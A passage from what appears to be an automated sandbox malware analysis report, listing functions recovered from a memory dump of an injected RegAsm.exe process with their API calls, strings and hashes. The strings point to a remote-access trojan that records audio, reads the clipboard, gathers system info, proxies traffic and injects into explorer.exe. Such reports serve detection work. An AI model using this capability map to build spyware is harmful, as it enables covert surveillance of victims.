                                                        • CloseHandle.KERNEL32(?), ref: 00404E4C
                                                        • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                        • CloseHandle.KERNEL32(?), ref: 00404EBF
                                                        • CloseHandle.KERNEL32(?), ref: 00404EC4
                                                        • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                        • CloseHandle.KERNEL32(?), ref: 00404ED6
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                        • String ID:
                                                        • API String ID: 3658366068-0
                                                        • Opcode ID: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                        • Instruction ID: 0c11cd9b042c69dc9d4dd2828563f6d61870a883144e53252efabab5b24bcc37
                                                        • Opcode Fuzzy Hash: 0463b1faaa3f7a02a97a49212c31dd980e99cbb732c39645afe60185321c9919
                                                        • Instruction Fuzzy Hash: BF21E871104B04AFDB216B26DC49B27BBA1FF40326F104A2EE2E211AF1CB75B851DB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000), ref: 004558C6
                                                        • GetLastError.KERNEL32 ref: 00455CEF
                                                        • __dosmaperr.LIBCMT ref: 00455CF6
                                                        • GetFileType.KERNEL32 ref: 00455D02
                                                        • GetLastError.KERNEL32 ref: 00455D0C
                                                        • __dosmaperr.LIBCMT ref: 00455D15
                                                        • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                        • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                        • GetLastError.KERNEL32 ref: 00455EB1
                                                        • __dosmaperr.LIBCMT ref: 00455EB8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                        • String ID: H
                                                        • API String ID: 4237864984-2852464175
                                                        • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                        • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                        • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                        • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                        • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                        • __alloca_probe_16.LIBCMT ref: 00453F94
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                        • __freea.LIBCMT ref: 00454003
                                                        • __freea.LIBCMT ref: 0045400F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                        • String ID: \@E
                                                        • API String ID: 201697637-1814623452
                                                        • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                                        • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                        • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                                        • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID: \&G$\&G$`&G
                                                        • API String ID: 269201875-253610517
                                                        • Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                                        • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                        • Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                                        • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 65535$udp
                                                        • API String ID: 0-1267037602
                                                        • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                        • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                        • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                        • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                        • __dosmaperr.LIBCMT ref: 0043A8A6
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                        • __dosmaperr.LIBCMT ref: 0043A8E3
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                        • __dosmaperr.LIBCMT ref: 0043A937
                                                        • _free.LIBCMT ref: 0043A943
                                                        • _free.LIBCMT ref: 0043A94A
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                        • String ID:
                                                        • API String ID: 2441525078-0
                                                        • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                                        • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                        • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                                        • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                        • GetMessageA.USER32 ref: 0040556F
                                                        • TranslateMessage.USER32(?), ref: 0040557E
                                                        • DispatchMessageA.USER32 ref: 00405589
                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                        • API String ID: 2956720200-749203953
                                                        • Opcode ID: 685fd760973951ef657dab710ca0ffd0d5e343078631b5a88e9e506cca6722c1
                                                        • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                        • Opcode Fuzzy Hash: 685fd760973951ef657dab710ca0ffd0d5e343078631b5a88e9e506cca6722c1
                                                        • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                        • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                        • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                        • String ID: 0VG$0VG$<$@$Temp
                                                        • API String ID: 1704390241-2575729100
                                                        • Opcode ID: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                                                        • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                        • Opcode Fuzzy Hash: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
                                                        • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenClipboard.USER32 ref: 00416941
                                                        • EmptyClipboard.USER32 ref: 0041694F
                                                        • CloseClipboard.USER32 ref: 00416955
                                                        • OpenClipboard.USER32 ref: 0041695C
                                                        • GetClipboardData.USER32 ref: 0041696C
                                                        • GlobalLock.KERNEL32 ref: 00416975
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                        • CloseClipboard.USER32 ref: 00416984
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                        • String ID: !D@
                                                        • API String ID: 2172192267-604454484
                                                        • Opcode ID: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                                                        • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                        • Opcode Fuzzy Hash: 4530cadbb14fddee25ef175d735482f5b7b1ecf010632631c9690fb3e5ed724f
                                                        • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                                        • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                                        • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                                        • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                                        • CloseHandle.KERNEL32(?), ref: 00413465
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                                        • String ID:
                                                        • API String ID: 297527592-0
                                                        • Opcode ID: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
                                                        • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                                        • Opcode Fuzzy Hash: 5003cb3ed55fcf4c39d9fd1ec3ffb571eced9d7f626cbcbb1053a8b93139944a
                                                        • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                        • String ID:
                                                        • API String ID: 221034970-0
                                                        • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                        • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                        • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                        • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00448135
                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                        • _free.LIBCMT ref: 00448141
                                                        • _free.LIBCMT ref: 0044814C
                                                        • _free.LIBCMT ref: 00448157
                                                        • _free.LIBCMT ref: 00448162
                                                        • _free.LIBCMT ref: 0044816D
                                                        • _free.LIBCMT ref: 00448178
                                                        • _free.LIBCMT ref: 00448183
                                                        • _free.LIBCMT ref: 0044818E
                                                        • _free.LIBCMT ref: 0044819C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                        • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                        • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                        • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Eventinet_ntoa
                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                        • API String ID: 3578746661-3604713145
                                                        • Opcode ID: a200ba08cca614f5ca41b60dfe45ad6e7d9639a173154d8eaf3edc2c4edf8b7b
                                                        • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                        • Opcode Fuzzy Hash: a200ba08cca614f5ca41b60dfe45ad6e7d9639a173154d8eaf3edc2c4edf8b7b
                                                        • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DecodePointer
                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                        • API String ID: 3527080286-3064271455
                                                        • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                        • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                        • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                        • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                        • Sleep.KERNEL32(00000064), ref: 00417521
                                                        • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                        • API String ID: 1462127192-2001430897
                                                        • Opcode ID: ec50ac54269d49d44067edab70f48f9f458cf939bf05b3af8c0101079797eb99
                                                        • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                        • Opcode Fuzzy Hash: ec50ac54269d49d44067edab70f48f9f458cf939bf05b3af8c0101079797eb99
                                                        • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CurrentProcess
                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                        • API String ID: 2050909247-4242073005
                                                        • Opcode ID: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                                                        • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                        • Opcode Fuzzy Hash: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                                                        • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _strftime.LIBCMT ref: 00401D50
                                                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                        • API String ID: 3809562944-243156785
                                                        • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                                        • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                        • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                                        • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                        • int.LIBCPMT ref: 00410E81
                                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                        • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                        • String ID: ,kG$0kG
                                                        • API String ID: 3815856325-2015055088
                                                        • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                        • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                        • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                        • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
